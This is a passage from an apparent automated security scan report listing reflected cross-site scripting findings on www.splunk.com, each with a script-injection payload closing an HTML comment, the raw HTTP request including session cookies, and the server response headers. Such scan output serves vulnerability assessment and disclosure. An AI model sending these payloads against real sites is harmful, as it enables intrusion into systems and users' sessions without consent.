The value of REST URL parameter 1 is copied into an HTML comment. The payload b0e48--><script>alert(1)</script>ca595a7ca02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewb0e48--><script>alert(1)</script>ca595a7ca02/SP-CAAAAAG HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload bfc82--><script>alert(1)</script>ef1ecd35f25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAAGbfc82--><script>alert(1)</script>ef1ecd35f25 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.501. http://www.splunk.com/view/SP-CAAAAAG [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/SP-CAAAAAG
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a93ad--><script>alert(1)</script>13cec529721 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAAG?a93ad--><script>alert(1)</script>13cec529721=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:19:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload fa2b1--><script>alert(1)</script>7698b7372f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewfa2b1--><script>alert(1)</script>7698b7372f0/SP-CAAAAAH HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload a370e--><script>alert(1)</script>b0dcdc76c36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAAHa370e--><script>alert(1)</script>b0dcdc76c36 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.504. http://www.splunk.com/view/SP-CAAAAAH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/SP-CAAAAAH
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload dd3b3--><script>alert(1)</script>8573955893e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAAH?dd3b3--><script>alert(1)</script>8573955893e=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:19:48 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e8b86--><script>alert(1)</script>872651a0663 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewe8b86--><script>alert(1)</script>872651a0663/SP-CAAAAH7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload f468c--><script>alert(1)</script>f6bc10e4ece was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAH7f468c--><script>alert(1)</script>f6bc10e4ece HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.507. http://www.splunk.com/view/SP-CAAAAH7 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/SP-CAAAAH7
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 71f46--><script>alert(1)</script>f41aad1bdad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAH7?71f46--><script>alert(1)</script>f41aad1bdad=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:20:17 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28354
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5fc15--><script>alert(1)</script>3127cb5f6e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view5fc15--><script>alert(1)</script>3127cb5f6e4/SP-CAAAFVN HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:18 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 04eef258084ce5cbd78231d4af91d6ed1297008198 Last-Modified: Sun, 06 Feb 2011 16:03:18 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 4c29e--><script>alert(1)</script>2184c2ad3e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAFVN4c29e--><script>alert(1)</script>2184c2ad3e7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:42 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: e4169140df5ae01ba7c7214b1be920fa1297008222 Last-Modified: Sun, 06 Feb 2011 16:03:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.510. http://www.splunk.com/view/SP-CAAAFVN [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/SP-CAAAFVN
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3aa7--><script>alert(1)</script>5f91d4c2cc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAFVN?b3aa7--><script>alert(1)</script>5f91d4c2cc1=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:02:54 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 55246895ba1ccb4925502c124dd90acd1297008174 Last-Modified: Sun, 06 Feb 2011 16:02:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37938
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c2db0--><script>alert(1)</script>5fa0ec96c9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
